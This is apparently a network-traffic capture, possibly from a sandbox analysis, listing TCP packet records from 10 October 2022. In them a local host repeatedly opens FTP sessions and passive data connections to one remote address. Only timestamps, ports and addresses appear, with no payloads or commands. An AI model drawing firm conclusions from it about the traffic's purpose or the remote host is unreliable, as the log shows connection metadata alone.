                                                                                                                                    Oct 10, 2022 06:03:13.910738945 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.934700012 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.934895992 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.938497066 CEST4992864642192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.965365887 CEST6464249928185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.965514898 CEST4992864642192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.965776920 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.990969896 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:13.991162062 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:13.992223978 CEST4992864642192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.017261028 CEST6464249928185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.017287970 CEST6464249928185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.017543077 CEST4992864642192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.017648935 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.017868996 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.018130064 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.040765047 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.041007996 CEST2149927185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.041140079 CEST4992721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.157289982 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.185260057 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.185565948 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.214240074 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.214284897 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.214315891 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.214415073 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.214415073 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.214415073 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.216638088 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.241657972 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.241832018 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.241921902 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.265906096 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.266103029 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.266665936 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.293322086 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.293498993 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.293574095 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.317878962 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.318120003 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.319221973 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.343758106 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.343895912 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.345160961 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.369970083 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.370141983 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.370970011 CEST4993064644192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.393654108 CEST6464449930185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.393820047 CEST4993064644192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.394124031 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.419549942 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.419650078 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.428618908 CEST4993064644192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.451423883 CEST6464449930185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.451474905 CEST6464449930185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.451545000 CEST4993064644192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.452219009 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.452311993 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.452466965 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.476639986 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.476697922 CEST2149929185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.476932049 CEST4992921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.588679075 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.611488104 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.611640930 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.638484955 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.638695002 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.638731956 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.638812065 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.639039993 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.639214039 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.662098885 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.662271023 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.671225071 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.694488049 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.694968939 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.695072889 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.718414068 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.718590021 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.718815088 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.742083073 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.746978045 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.747879028 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.770711899 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.771861076 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.776492119 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.799634933 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.799927950 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.800129890 CEST4993264645192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.824103117 CEST6464549932185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.824239969 CEST4993264645192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.824609995 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.848211050 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.851926088 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.852739096 CEST4993264645192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.875766039 CEST6464549932185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.875957012 CEST6464549932185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.876045942 CEST4993264645192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.876455069 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.876550913 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.876734972 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:14.899148941 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.899202108 CEST2149931185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:14.899339914 CEST4993121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.041305065 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.064157963 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.064311028 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.091049910 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.091156006 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.091175079 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.091208935 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.091236115 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.091419935 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.091969013 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.114655972 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.114908934 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.115108013 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.137892008 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.143026114 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.143162966 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.166024923 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.167149067 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.167896986 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.191260099 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.194350958 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.195513010 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.218194962 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.218842030 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.228310108 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.251306057 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.254024029 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.254354954 CEST4993464646192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.281138897 CEST6464649934185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.281420946 CEST4993464646192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.282140970 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.306598902 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.306723118 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.307353020 CEST4993464646192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.333822966 CEST6464649934185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.334652901 CEST6464649934185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.334814072 CEST4993464646192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.334953070 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.339929104 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.340192080 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.362457037 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.362488031 CEST2149933185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.362684011 CEST4993321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.491482019 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.515687943 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.519972086 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.548466921 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.548496008 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.548538923 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.548685074 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.548949957 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.575973988 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.579951048 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.580153942 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.608983994 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.611987114 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.612304926 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.636883020 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.637168884 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.638467073 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.663453102 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.663718939 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.664664984 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.690705061 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.691107035 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.693459034 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.720006943 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.720520020 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.720949888 CEST4993664648192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.744019032 CEST6464849936185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.744160891 CEST4993664648192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.744677067 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.770870924 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.771121025 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.771631956 CEST4993664648192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.794399977 CEST6464849936185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.794445038 CEST6464849936185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.794540882 CEST4993664648192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.796840906 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.796982050 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.800285101 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.825493097 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.825542927 CEST2149935185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.825663090 CEST4993521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.939100981 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.961623907 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.961805105 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.988606930 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.988635063 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.988647938 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:15.988861084 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:15.989022970 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.013091087 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.013324976 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.014139891 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.036730051 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.037007093 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.037230015 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.059762001 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.060009956 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.061048985 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.084081888 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.084316015 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.084758043 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.107240915 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.107368946 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.109095097 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.132003069 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.132206917 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.132428885 CEST4993864649192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.155761003 CEST6464949938185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.155936003 CEST4993864649192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.156229973 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.180135965 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.180260897 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.180859089 CEST4993864649192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.205032110 CEST6464949938185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.205131054 CEST6464949938185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.205204964 CEST4993864649192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.205727100 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.205813885 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.205995083 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.228250980 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.228322983 CEST2149937185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.228604078 CEST4993721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.340234995 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.362818956 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.362930059 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.388931990 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.389010906 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.389065981 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.389132977 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.389285088 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.389542103 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.389714956 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.412408113 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.412708998 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.412830114 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.435684919 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.435851097 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.435977936 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.458650112 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.459036112 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.459199905 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.482135057 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.482364893 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.483294010 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.505908966 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.506211996 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.508487940 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.531639099 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.531744003 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.531992912 CEST4994064651192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.555787086 CEST6465149940185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.555958986 CEST4994064651192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.556252003 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.580708027 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.581070900 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.581460953 CEST4994064651192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.606295109 CEST6465149940185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.606570959 CEST6465149940185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.606657982 CEST4994064651192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.607763052 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.608113050 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.609674931 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.633054018 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.633209944 CEST2149939185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.633418083 CEST4993921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.747809887 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.770565033 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.770950079 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.796880007 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.796921015 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.796932936 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.797224998 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.802356958 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.825185061 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.825334072 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.827545881 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.850511074 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.850706100 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.850812912 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.873681068 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.873882055 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.874816895 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.898112059 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.898220062 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.898859024 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.922920942 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.923105955 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.924218893 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.948154926 CEST2149941185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:16.948443890 CEST4994121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:16.950593948 CEST4994264653192.168.2.3185.106.92.60
